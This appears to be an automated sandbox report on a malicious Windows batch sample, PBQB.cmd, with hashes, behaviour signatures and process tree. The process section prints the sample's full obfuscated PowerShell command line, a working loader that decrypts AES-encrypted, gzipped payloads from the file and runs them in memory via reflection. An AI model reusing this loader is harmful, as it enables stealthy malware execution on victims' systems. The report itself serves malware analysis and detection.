Analysis
-
max time kernel
27s -
max time network
31s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
05-05-2023 11:18
Static task
static1
Behavioral task
behavioral1
Sample
PBQB.cmd
Resource
win7-20230220-en
General
-
Target
PBQB.cmd
-
Size
366KB
-
MD5
4b5e91dc56c53e6d9a765c8fda760786
-
SHA1
f2081c4500b6f324ab840bc1dd89370d355367ef
-
SHA256
c112a2d7b7f2d1297d817b89dcdea142b4bd439bd533db9f6aa8b36d8d943d64
-
SHA512
ef5f8186f33ce964875adac3e151b9a6f036a8ad9c86c6b017ed8185da967c1693e62135a2c59ae5737dd4d1b35aa63d805a7a84352797aeb8c7cbe55d39378b
-
SSDEEP
6144:ds0RP07shisP903rwOoQ2zUT540YjzcPuhLJpQyaTRBIT4uxWVqxcS4DHATSNfw3:ds0C7Yt67rd4rAPA4yaTcdfP4Tbqdsy
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1652 PBQB.cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1652 PBQB.cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1652 PBQB.cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1652 PBQB.cmd.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1596 wrote to memory of 796 1596 cmd.exe 29 PID 1596 wrote to memory of 796 1596 cmd.exe 29 PID 1596 wrote to memory of 796 1596 cmd.exe 29 PID 796 wrote to memory of 1652 796 cmd.exe 31 PID 796 wrote to memory of 1652 796 cmd.exe 31 PID 796 wrote to memory of 1652 796 cmd.exe 31 PID 796 wrote to memory of 1652 796 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\PBQB.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\PBQB.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Users\Admin\AppData\Local\Temp\PBQB.cmd.exe"C:\Users\Admin\AppData\Local\Temp\PBQB.cmd.exe" -w hidden -c $cKeS='FiGzumrGzumstGzum'.Replace('Gzum', '');$YEQK='ReGzumadLGzumineGzumsGzum'.Replace('Gzum', '');$HYrn='CGzumhaGzumngeEGzumxGzumteGzumnsGzumioGzumnGzum'.Replace('Gzum', '');$tqkz='FrGzumoGzummBGzumase6Gzum4SGzumtGzumrinGzumgGzum'.Replace('Gzum', '');$iEzw='InvGzumokeGzum'.Replace('Gzum', '');$dcHH='CGzumreGzumaGzumteGzumDGzumecGzumryGzumptGzumorGzum'.Replace('Gzum', '');$FsUE='TranGzumsfGzumormGzumFinGzumalGzumBlGzumockGzum'.Replace('Gzum', '');$vEzX='LGzumoaGzumdGzum'.Replace('Gzum', '');$duPq='MGzumainGzumMoGzumduleGzum'.Replace('Gzum', '');$Rlgx='EnGzumtrGzumyGzumPoiGzumnGzumtGzum'.Replace('Gzum', '');$zZjM='SpGzumlGzumiGzumtGzum'.Replace('Gzum', '');$NaNe='GeGzumtGzumCurGzumreGzumntGzumPrGzumocGzumessGzum'.Replace('Gzum', '');function qOKxj($LqdXv){$nYPjY=[System.Security.Cryptography.Aes]::Create();$nYPjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nYPjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nYPjY.Key=[System.Convert]::$tqkz('m6r1zR1pFEMA3f9SE7PuYXUI2auUhEBpjU0yEINKcPY=');$nYPjY.IV=[System.Convert]::$tqkz('7oOIIfAuaEyrYT+vuMQ9vA==');$CvxkF=$nYPjY.$dcHH();$libhk=$CvxkF.$FsUE($LqdXv,0,$LqdXv.Length);$CvxkF.Dispose();$nYPjY.Dispose();$libhk;}function LxFui($LqdXv){$XJLWk=New-Object System.IO.MemoryStream(,$LqdXv);$IKXcR=New-Object System.IO.MemoryStream;$zCbYq=New-Object System.IO.Compression.GZipStream($XJLWk,[IO.Compression.CompressionMode]::Decompress);$zCbYq.CopyTo($IKXcR);$zCbYq.Dispose();$XJLWk.Dispose();$IKXcR.Dispose();$IKXcR.ToArray();}$mdGgV=[System.Linq.Enumerable]::$cKeS([System.IO.File]::$YEQK([System.IO.Path]::$HYrn([System.Diagnostics.Process]::$NaNe().$duPq.FileName, $null)));$EyBOW=$mdGgV.Substring(3).$zZjM(':');$XjxKT=LxFui (qOKxj ([Convert]::$tqkz($EyBOW[0])));$NUCBP=LxFui (qOKxj ([Convert]::$tqkz($EyBOW[1])));[System.Reflection.Assembly]::$vEzX([byte[]]$NUCBP).$Rlgx.$iEzw($null,$null);[System.Reflection.Assembly]::$vEzX([byte[]]$XjxKT).$Rlgx.$iEzw($null,$null);3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f